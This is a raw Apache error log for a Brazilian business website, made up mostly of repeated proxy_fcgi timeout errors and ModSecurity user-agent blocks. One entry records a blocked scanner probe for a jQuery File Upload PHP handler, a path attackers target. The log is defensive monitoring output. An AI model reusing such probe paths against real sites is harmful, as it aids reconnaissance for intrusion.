[Sun Mar 15 15:43:39.125862 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:44:01.125854 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47510] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:44:23.137817 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:44:46.133899 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47934] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:45:07.042820 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48120] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:45:28.129848 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48286] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:45:50.134926 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48522] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:46:11.129897 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:46:32.148692 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48930] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:46:54.122018 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49088] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:47:15.129831 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:47:18.270254 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.228.16:48196] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb-trABkC4fWIHEf8GGNQAAAFE"]
[Sun Mar 15 15:47:36.129896 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:47:57.127755 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:48:18.113847 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:48:40.100398 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49964] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:49:02.138349 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:49:23.129830 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:49:45.125837 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50688] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:50:11.129808 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:50:33.081977 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51124] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:50:55.157805 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:51:16.130025 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:51:37.133812 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51866] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:51:58.045909 2026] [proxy_fcgi:error] [pid 21533:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:52:19.208572 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.228.16:35296] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abb_45qj1wV0Si-Oked9ZAAAAA0"]
[Sun Mar 15 15:52:20.130384 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52176] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:52:41.126510 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52422] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:53:02.132009 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:53:05.034963 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.244.31:57446] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcAEXjZBu2q05ozVU_vcgAAAUk"]
[Sun Mar 15 15:53:23.133909 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:53:44.123217 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:54:10.085910 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53250] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:54:31.137865 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:54:53.129820 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53682] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:55:14.133860 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53876] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:55:35.129843 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:55:56.125811 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54200] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:56:18.125872 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54386] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:56:40.128122 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:57:01.105822 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54692] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:57:22.129783 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:57:44.112923 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55112] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:57:47.254957 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.228.16:41424] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcBK7ABkC4fWIHEf8GHXgAAAE8"]
[Sun Mar 15 15:58:05.057895 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:58:09.728225 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.244.31:39240] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcBQZqj1wV0Si-Oked-FQAAABU"]
[Sun Mar 15 15:58:26.085829 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:58:47.117876 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55620] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:59:08.127817 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:59:32.111008 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:59:54.053943 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56222] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:00:15.069825 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:00:37.833846 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:00:59.129785 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56866] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:01:20.029903 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57046] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:01:41.129795 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57230] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:02:02.121809 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57414] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:02:23.117601 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:02:44.129786 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57722] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:03:05.129824 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57846] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:03:26.125859 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58104] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:03:35.305499 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.244.31:57600] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcCh9SswJuvopo3lOgCvgAAAIU"]
[Sun Mar 15 16:03:48.129765 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58254] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:04:00.259212 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.228.16:35274] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcCoHjZBu2q05ozVU_wtwAAAU4"]
[Sun Mar 15 16:04:09.141779 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58418] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:04:30.133243 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58556] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:04:51.074015 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:05:16.129780 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58996] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:05:38.057910 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:06:00.129875 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59604] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:06:21.144318 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59886] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:06:42.122093 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:07:03.133848 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60230] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:07:25.129831 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60478] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:07:46.122993 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60686] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:08:08.096141 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:08:34.093570 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:32902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:08:37.408196 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.244.31:54770] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcDtdSswJuvopo3lOgDZAAAAJU"]
[Sun Mar 15 16:08:55.122138 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33106] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:09:07.475886 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.228.16:38196] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcD03jZBu2q05ozVU_xTgAAAVE"]
[Sun Mar 15 16:09:16.137788 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33340] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:09:37.083103 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33558] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:09:59.122079 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33784] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:10:21.116912 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33996] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:10:43.173820 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34224] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:11:22.129899 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:11:44.121657 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:12:06.125787 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35170] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:12:27.122128 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35310] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:12:48.125798 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35482] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:13:10.121787 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35662] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:13:31.141871 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35948] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:13:55.121896 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:14:06.534021 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.244.31:44750] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcE_nbQATo66fKoS7znIQAAAMQ"]
[Sun Mar 15 16:14:17.133808 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36498] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:14:29.408567 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.228.16:56906] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcFFdSswJuvopo3lOgEBgAAAJA"]
[Sun Mar 15 16:14:38.133833 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:14:52.580001 2026] [:error] [pid 21946:tid 140411649607424] [client 87.121.84.71:35244] [client 87.121.84.71] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "ALittle" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/admin/plugins/jquery-file-upload/server/php/index.php"] [unique_id "abcFLHbQATo66fKoS7znQgAAAMs"]
[Sun Mar 15 16:14:59.134371 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36862] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:15:21.149800 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37074] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:15:44.130384 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:16:05.123864 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:16:29.129810 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:17:01.120302 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38186] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:17:29.121344 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:17:50.125780 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:18:12.147618 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38752] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:18:33.133799 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39034] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:18:54.148327 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39352] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:19:07.552810 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.244.31:54034] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcGK3jZBu2q05ozVU_zGAAAAVc"]
[Sun Mar 15 16:19:18.125808 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39722] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:19:40.126880 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39938] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:20:01.473565 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40178] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:20:23.133785 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:20:44.119194 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40680] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:21:07.164716 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:21:29.137768 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:21:51.057850 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41540] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:22:23.046136 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41984] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:22:51.282559 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:23:13.129775 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:23:34.122476 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42934] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:23:55.132072 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:24:17.153779 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43558] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:24:41.129796 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:43928] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:25:02.141855 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:25:24.130508 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:25:45.145932 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:26:06.121893 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:26:30.136279 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45378] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:26:51.129806 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 16:27:14.121262 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45986] AH01075: Error dispatching request to : (polling)
